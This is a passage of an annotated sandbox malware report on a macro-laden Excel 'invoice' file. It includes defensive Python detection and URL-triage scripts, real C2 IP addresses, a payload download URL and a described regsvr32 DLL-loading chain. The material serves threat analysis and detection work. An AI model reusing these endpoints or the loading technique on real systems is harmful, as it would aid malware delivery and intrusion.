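USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata\\|programdata\\|users\\public\\|temp\\)", re.I
)
SILENT_SWITCH = re.compile(r"(?:^|\s)[/-]s(?=\s|$)", re.I)
WEB_PORTS = {80, 443}

SAMPLE_EVENTS: List[Dict] = [  # constructed from the report's process tree
    {"type": "process_create", "pid": 1234,
     "parent_image": r"C:\Windows\System32\regsvr32.exe",
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll"},
    {"type": "network_connect", "pid": 1234, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "dst_ip": "198.57.200.100", "dst_port": 3786},
    {"type": "network_connect", "pid": 1234, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "dst_ip": "194.225.58.214", "dst_port": 443},
    # benign control: an installer registering a COM server from Program Files
    {"type": "process_create", "pid": 4321,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"C:\Windows\System32\regsvr32.exe /s C:\Program Files\Vendor\vendorctl.dll"},
]


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str


def is_regsvr32(image: str) -> bool:
    return image.lower().endswith("\\regsvr32.exe")


def dll_argument(cmdline: str) -> str:
    """Return the module path from a regsvr32 command line.

    Drops the leading executable token and regsvr32's switches
    (/s /u /n /i[:cmdline]). A quoted module path containing spaces is not
    handled; that is an assumption sufficient for the constructed events.
    """
    rest = re.sub(r'^(?:"[^"]+"|\S+)\s*', "", cmdline)
    rest = re.sub(r"(?:^|\s)[/-](?:s|u|n|i(?::\S*)?)(?=\s|$)", " ", rest, flags=re.I)
    return rest.strip().strip('"')


def evaluate(events: List[Dict]) -> List[Alert]:
    """Run the three rules over a list of events; returns every hit."""
    alerts: List[Alert] = []
    for ev in events:
        if not is_regsvr32(ev["image"]):
            continue
        pid = ev["pid"]
        if ev["type"] == "process_create":
            cmd = ev["cmdline"]
            dll = dll_argument(cmd)
            if SILENT_SWITCH.search(cmd) and USER_WRITABLE.search(dll):
                alerts.append(Alert("regsvr32_silent_load_user_writable_dll", pid, dll))
            if is_regsvr32(ev.get("parent_image", "")):
                alerts.append(Alert("regsvr32_spawns_regsvr32", pid, ev["parent_image"]))
        elif ev["type"] == "network_connect":
            dst = f'{ev["dst_ip"]}:{ev["dst_port"]}'
            # regsvr32 has no business opening sockets; any connection is a hit
            alerts.append(Alert("regsvr32_network_connect", pid, dst))
            if ev["dst_port"] not in WEB_PORTS:
                alerts.append(Alert("regsvr32_network_nonstandard_port", pid, dst))
    return alerts


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"{a.rule:45} pid={a.pid} {a.detail}")
```

The user-writable path rule is the one that separates the benign control from the sample: both command lines use silent mode, so the switch alone is not a signal. The parent-child rule corresponds to the 64-bit to 32-bit regsvr32 hop recorded above; if a 32-bit Office process had invoked SysWOW64\regsvr32.exe directly it would not fire, which is why the path and network rules are kept independent of it.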

Mitre Att&ck Matrix

Techniques per tactic, in the order the matrix lists them. Trailing numbers are the report's own hit counters, kept as printed; cells without a counter are the matrix's unmatched placeholders.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Scripting 32; Exploitation for Client Execution 43; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 112; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading 11; Virtualization/Sandbox Evasion 1; Disable or Modify Tools 1; Process Injection 112; Scripting 32; Regsvr32 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry 1; Virtualization/Sandbox Evasion 1; Process Discovery 11; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 23
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel 2; Non-Standard Port 1; Ingress Tool Transfer 12; Non-Application Layer Protocol 2; Application Layer Protocol 23; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data

Behavior Graph

Behavior Graph ID: 342716  Sample: 1_Total New Invoices-Thursd...  Start date: 21/01/2021  Architecture: WINDOWS  Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for submitted file; Document exploit detected (drops PE files); 7 other signatures

The graph, rendered as a process tree (node counters kept as printed):

EXCEL.EXE (247 73)
  Contacted: reliablelifts.co.in 103.83.81.27, port 443, local port 49169, ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN, India; creditoenusa.com 192.185.224.50, port 443, local port 49191, UNIFIEDLAYER-AS-1US, United States; 3 other IPs or domains
  Dropped: C:\Users\user\AppData\Local\Temp\sxzjqf.dll (PE32); C:\Users\user\AppData\Local\...\nnmumzom.dll (PE32); C:\Users\user\AppData\Local\Temp\kxwni.dll (PE32); 6 other malicious files
  Signatures: Document exploit detected (creates forbidden files); Document exploit detected (process start blacklist hit); Document exploit detected (UrlDownloadToFile)
  Started: regsvr32.exe; regsvr32.exe; regsvr32.exe; 7 other processes
    regsvr32.exe (first)  ->  started regsvr32.exe
      Signature: System process connects to network (likely due to code injection or exploit)
    regsvr32.exe (second)  ->  started regsvr32.exe (9)
      Contacted: 198.57.200.100, port 3786, local ports 49173, 49179, UNIFIEDLAYER-AS-1US, United States; 194.225.58.214, port 443, local ports 49170, 49174, TUMS-IR-ASIR, Iran (ISLAMIC Republic Of); 2 other IPs or domains
    regsvr32.exe (third)  ->  started regsvr32.exe (9)
    7 other processes  ->  started regsvr32.exe (9); regsvr32.exe (9)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm  Detection: 27%  Scanner: Virustotal

Dropped Files
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip  Detection: 9%  Scanner: ReversingLabs  Label: Win32.Trojan.Generic
Source: C:\Users\user\AppData\Local\Temp\nnmumzom.dll  Detection: 9%  Scanner: ReversingLabs  Label: Win32.Trojan.Generic

The cached download hknmwj[1].zip carries the same Win32 trojan label as the Temp DLL: the file fetched from stellarum.com.br is a PE with a .zip name, which is what the "non-matching file extension" signature refers to, and the macro writes it out under a DLL name for regsvr32. Low detection percentages at analysis time are typical for a freshly built loader and say nothing about the file being benign.

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

URL                                                       Detection  Scanner          Verdict
https://211.110.44.63:5353/                               0%         Avira URL Cloud  safe
https://69.164.207.140/                                   0%         Avira URL Cloud  safe
https://69.164.207.140:3388/C                             0%         Avira URL Cloud  safe
http://ocsp.entrust.net03                                 0%         URL Reputation   safe (3 results)
https://194.225.58.214/                                   0%         Avira URL Cloud  safe
https://211.110.44.63:5353/8                              0%         Avira URL Cloud  safe
https://69.164.207.140/T                                  0%         Avira URL Cloud  safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 0%         URL Reputation   safe (3 results)
https://69.164.207.140:3388/7                             0%         Avira URL Cloud  safe
https://69.164.207.140:3388/hy                            0%         Avira URL Cloud  safe
http://www.diginotar.nl/cps/pkioverheid0                  0%         URL Reputation   safe (3 results)
http://stellarum.com.br/hknmwj.zip                        0%         Avira URL Cloud  safe
https://198.57.200.100:3786/XE                            0%         Avira URL Cloud  safe
https://69.164.207.140:3388/                              0%         Avira URL Cloud  safe
https://198.57.200.100:3786/                              0%         Avira URL Cloud  safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0             0%         URL Reputation   safe (3 results)
https://198.57.200.100/                                   0%         Avira URL Cloud  safe
https://194.225.58.214/P                                  0%         Avira URL Cloud  safe
https://194.225.58.214/Y                                  0%         Avira URL Cloud  safe
http://crl.co                                             0%         Avira URL Cloud  safe
https://211.110.44.63/                                    0%         Avira URL Cloud  safe
https://194.225.58.214/X                                  0%         Avira URL Cloud  safe
https://198.57.200.100:3786/hy                            0%         Avira URL Cloud  safe
https://69.164.207.140/M                                  0%         Avira URL Cloud  safe
http://ocsp.entrust.net0D                                 0%         URL Reputation   safe (3 results)
https://198.57.200.100/_                                  0%         Avira URL Cloud  safe
https://194.225.58.214/C                                  0%         Avira URL Cloud  safe
http://servername/isapibackend.dll                        0%         Avira URL Cloud  safe
https://69.164.207.140:3388/JE                            0%         Avira URL Cloud  safe
https://198.57.200.100:3786/&                             0%         Avira URL Cloud  safe

Reading this table: a 0% / safe verdict on a bare IP:port URL means the reputation service has no record of it, not that it is benign. The four IP literals are the hosts the regsvr32 payload connected to (see the Contacted IPs table, where three of them are marked malicious), and 3786, 3388 and 5353 are the non-standard ports behind the "Non-Standard Port" technique in the matrix. The one- or two-character path suffixes (/C, /7, /hy, /XE, /&) are most likely adjacent memory bytes picked up with the string rather than real paths. The CRL, OCSP and CPS URLs come from X.509 certificates in memory (the trailing 0, 03 and 0D are ASN.1 length bytes fused onto the string) and are not contacted endpoints; http://servername/isapibackend.dll is a placeholder string and does not appear among the contacted domains.

Domains and IPs

Contacted Domains

Name                   IP               Active  Malicious  Antivirus Detection  Reputation
creditoenusa.com       192.185.224.50   true    false      (none)               unknown
stellarum.com.br       191.252.144.65   true    false      (none)               unknown
qsf.surfescape.net     64.37.52.172     true    false      (none)               unknown
reliablelifts.co.in    103.83.81.27     true    false      (none)               unknown
shopandmartonline.com  198.136.54.91    true    false      (none)               unknown

These five domains were contacted by EXCEL.EXE itself over port 443 (see the behavior graph), i.e. by the macro's download stage rather than by the regsvr32 payload; only the stellarum.com.br request is recorded as a full URL below. The report marks none of them malicious, which is consistent with ordinary websites serving the payload rather than attacker-owned infrastructure, but that is an inference, not something the report states.

Contacted URLs

Name                                Malicious  Antivirus Detection    Reputation
http://stellarum.com.br/hknmwj.zip  false      Avira URL Cloud: safe  unknown

URLs from Memory and Binaries

Each entry: the URL, the regsvr32.exe memory dumps it was found in, the report's Malicious flag, the antivirus verdict and the reputation.

https://211.110.44.63:5353/
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://69.164.207.140/
  Found in: regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://69.164.207.140:3388/C
  Found in: regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
http://crl.entrust.net/server1.crl0
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Reputation: high
http://ocsp.entrust.net03
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  URL Reputation: safe (3 results)  Reputation: unknown
https://194.225.58.214/
  Found in: regsvr32.exe 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://211.110.44.63:5353/8
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://69.164.207.140/T
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  URL Reputation: safe (3 results)  Reputation: unknown
https://69.164.207.140:3388/7
  Found in: regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://69.164.207.140:3388/hy
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
http://www.diginotar.nl/cps/pkioverheid0
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  URL Reputation: safe (3 results)  Reputation: unknown
https://198.57.200.100:3786/XE
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://69.164.207.140:3388/
  Found in: regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://198.57.200.100:3786/
  Found in: regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  URL Reputation: safe (3 results)  Reputation: unknown
https://198.57.200.100/
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://194.225.58.214/P
  Found in: regsvr32.exe 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://194.225.58.214/Y
  Found in: regsvr32.exe 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
http://crl.co
  Found in: regsvr32.exe 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://211.110.44.63/
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://194.225.58.214/X
  Found in: regsvr32.exe 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://198.57.200.100:3786/hy
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://69.164.207.140/M
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
http://ocsp.entrust.net0D
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  URL Reputation: safe (3 results)  Reputation: unknown
https://198.57.200.100/_
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://secure.comodo.com/CPS0
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Reputation: high
https://194.225.58.214/C
  Found in: regsvr32.exe 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
http://servername/isapibackend.dll
  Found in: regsvr32.exe 00000002.00000002.2105222828.0000000001D00000.00000002.00000001.sdmp; regsvr32.exe 00000005.00000002.2120262017.0000000001CE0000.00000002.00000001.sdmp; regsvr32.exe 00000007.00000002.2121003757.0000000001D00000.00000002.00000001.sdmp; regsvr32.exe 0000000A.00000002.2458603358.0000000001DA0000.00000002.00000001.sdmp; regsvr32.exe 0000000B.00000002.2510481818.0000000001DF0000.00000002.00000001.sdmp; regsvr32.exe 0000000E.00000002.2253344660.0000000001CA0000.00000002.00000001.sdmp; regsvr32.exe 0000000F.00000002.2253526662.0000000001DF0000.00000002.00000001.sdmp; regsvr32.exe 00000010.00000002.2440450809.0000000001CB0000.00000002.00000001.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: low
http://crl.entrust.net/2048ca.crl0
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp; regsvr32.exe 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp; regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp; regsvr32.exe 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp
  Malicious: false  Reputation: high
https://69.164.207.140:3388/JE
  Found in: regsvr32.exe 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
https://198.57.200.100:3786/&
  Found in: regsvr32.exe 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp
  Malicious: false  Avira URL Cloud: safe  Reputation: unknown
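Turning the URL tables above into indicators takes a few normalisation steps: collapsing the memory fragments onto their host and port, separating certificate plumbing from C2, and keeping the one real download URL. The script below is an added example, not Joe Sandbox code and not a general IOC standard; its classification rules are heuristics chosen for this report, and the URL list is a subset copied from the tables above.

```python
"""Triage the URL strings a sandbox pulled from process memory.

Added example, not Joe Sandbox code. REPORT_URLS is a subset copied from this
report's URL tables. Three things are separated: IP-literal endpoints
(normalised to host:port, implicit 443/80 filled in, stray path fragments
dropped), X.509 certificate plumbing (CRL/OCSP/CPS URLs, whose trailing '0',
'03', '0D' are ASN.1 length bytes fused onto the string), and file downloads.
The rules are heuristics chosen for this report, not a general standard.
"""
import ipaddress
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

REPORT_URLS = [
    "https://211.110.44.63:5353/", "https://211.110.44.63:5353/8", "https://211.110.44.63/",
    "https://69.164.207.140/", "https://69.164.207.140/T",
    "https://69.164.207.140:3388/C", "https://69.164.207.140:3388/hy", "https://69.164.207.140:3388/JE",
    "https://194.225.58.214/", "https://194.225.58.214/P",
    "https://198.57.200.100:3786/XE", "https://198.57.200.100:3786/&",
    "https://198.57.200.100/", "https://198.57.200.100/_",
    "http://crl.entrust.net/server1.crl0", "http://ocsp.entrust.net03", "http://ocsp.entrust.net0D",
    "http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0",
    "http://www.diginotar.nl/cps/pkioverheid0", "http://crl.co", "https://secure.comodo.com/CPS0",
    "http://servername/isapibackend.dll",
    "http://stellarum.com.br/hknmwj.zip",
]

CERT_HOST = re.compile(r"^(?:ocsp|crl)\.", re.I)   # revocation endpoints
CERT_PATH = re.compile(r"\.crl|/cps", re.I)         # CRL files, policy statements
PAYLOAD_EXT = (".zip", ".exe", ".dll")
WEB_PORTS = {80, 443}


def classify(url: str) -> Tuple[str, str]:
    """Return (category, key) for one memory string."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass
    else:
        # IP literal: the path fragment is noise, the host:port is the indicator
        port = parts.port or (443 if parts.scheme == "https" else 80)
        return "endpoint", f"{host}:{port}"
    if CERT_HOST.search(host) or CERT_PATH.search(parts.path):
        return "cert_residue", host
    if "." in host and parts.path.lower().endswith(PAYLOAD_EXT):
        return "download", url
    return "other", url


def triage(urls: List[str]) -> Dict[str, List[str]]:
    """Bucket and de-duplicate every URL; each bucket is returned sorted."""
    buckets: Dict[str, Set[str]] = {
        "endpoint": set(), "cert_residue": set(), "download": set(), "other": set()
    }
    for u in urls:
        cat, key = classify(u)
        buckets[cat].add(key)
    return {cat: sorted(keys) for cat, keys in buckets.items()}


def nonstandard_port_endpoints(endpoints: List[str]) -> List[str]:
    """Endpoints worth a firewall rule on the port alone."""
    return [e for e in endpoints if int(e.rsplit(":", 1)[1]) not in WEB_PORTS]


if __name__ == "__main__":
    result = triage(REPORT_URLS)
    for cat, keys in result.items():
        print(f"{cat}: {keys}")
    print("non-standard ports:", nonstandard_port_endpoints(result["endpoint"]))
```

Run on the full tables the endpoint bucket shrinks to seven host:port pairs, three of them on 3786, 3388 and 5353. The certificate bucket is what to discard before sharing indicators: blocking ocsp.entrust.net because it appeared in a malware report breaks revocation checking for everyone.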

Contacted IPs

Public

IP              Domain   Country                     ASN     ASN Name                                          Malicious
69.164.207.140  unknown  United States               63949   LINODE-APLinodeLLCUS                              true
192.185.224.50  unknown  United States               46606   UNIFIEDLAYER-AS-1US                               false
211.110.44.63   unknown  Korea Republic of           9318    SKB-ASSKBroadbandCoLtdKR                          true
191.252.144.65  unknown  Brazil                      27715   LocawebServicosdeInternetSABR                     false
194.225.58.214  unknown  Iran (ISLAMIC Republic Of)  43965   TUMS-IR-ASIR                                      true
103.83.81.27    unknown  India                       138251  ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN  false
198.57.200.100  unknown  United States               46606   UNIFIEDLAYER-AS-1US                               true
198.136.54.91   unknown  United States               33182   DIMENOCUS                                         false
64.37.52.172    unknown  United States               33182   DIMENOCUS                                         false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 342716
Start date: 21.01.2021
Start time: 16:02:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 57s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 1_Total New Invoices-Thursday January 21_2021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winXLSM@31/24@6/9
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 192.35.177.64, 8.241.121.254, 8.248.141.254, 8.248.133.254, 8.253.204.121, 8.248.147.254, 8.248.115.254, 67.27.158.254, 8.248.139.254
• Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                  Simulations

                  Behavior and APIs

Time | Type | Description
16:03:42 | API Interceptor | 2068x Sleep call for process: regsvr32.exe modified

                  Joe Sandbox View / Context

                  IPs

Match | Associated Sample Name / URL | Detection

69.164.207.140 (all associated samples detected as malicious):
• SecuriteInfo.com.Generic.mg.a01d5a105e5f7f87.dll
• SecuriteInfo.com.Generic.mg.fbb5fe400b44ef9a.dll
• SecuriteInfo.com.Generic.mg.d924aab258633ad2.dll
• SecuriteInfo.com.Generic.mg.a373cb816e14fc35.dll
• SecuriteInfo.com.Generic.mg.a044b05b562df10c.dll
• SecuriteInfo.com.Generic.mg.002c56165a0e7836.dll
• SecuriteInfo.com.Generic.mg.6d5e0ebf3d8c6d2b.dll
• 1 Total New Invoices-Thursday January 21 2021.xlsm
• 1 Total New Invoices-Thursday January 21 2021.xlsm
• dxkzp.dll
• flUDsS5Lcy.dll
• printouts of outstanding_as_of_01_20_2021.xlsm
• f77i5e.zip.dll
• Statement of Account as of_01_20_2021.xlsm
• bttxlf4.zip.dll
• printouts of outstanding as of 01_20_2021.xlsm
• Statement of Account as of 01_20_2021.xlsm
• sample20210120-01.xlsm
• by9zwa7p1zip.dll
• Information_265667970.doc

211.110.44.63 (all associated samples detected as malicious):
• SecuriteInfo.com.Generic.mg.a01d5a105e5f7f87.dll
• SecuriteInfo.com.Generic.mg.fbb5fe400b44ef9a.dll
• SecuriteInfo.com.Generic.mg.d924aab258633ad2.dll
• SecuriteInfo.com.Generic.mg.a373cb816e14fc35.dll
• SecuriteInfo.com.Generic.mg.a044b05b562df10c.dll
• SecuriteInfo.com.Generic.mg.002c56165a0e7836.dll
• SecuriteInfo.com.Generic.mg.6d5e0ebf3d8c6d2b.dll
• 1 Total New Invoices-Thursday January 21 2021.xlsm
• 1 Total New Invoices-Thursday January 21 2021.xlsm
• dxkzp.dll
• flUDsS5Lcy.dll
• printouts of outstanding_as_of_01_20_2021.xlsm
• f77i5e.zip.dll
• Statement of Account as of_01_20_2021.xlsm
• bttxlf4.zip.dll
• printouts of outstanding as of 01_20_2021.xlsm
• Statement of Account as of 01_20_2021.xlsm
• sample20210120-01.xlsm
• by9zwa7p1zip.dll

                                                                                                Domains

                                                                                                No context

                                                                                                ASN

Match | Associated Sample Name / URL | Detection | Context (IP)

LINODE-AP Linode, LLC, US (all associated samples detected as malicious):
• SecuriteInfo.com.Generic.mg.a01d5a105e5f7f87.dll: 69.164.207.140
• SecuriteInfo.com.Generic.mg.fbb5fe400b44ef9a.dll: 69.164.207.140
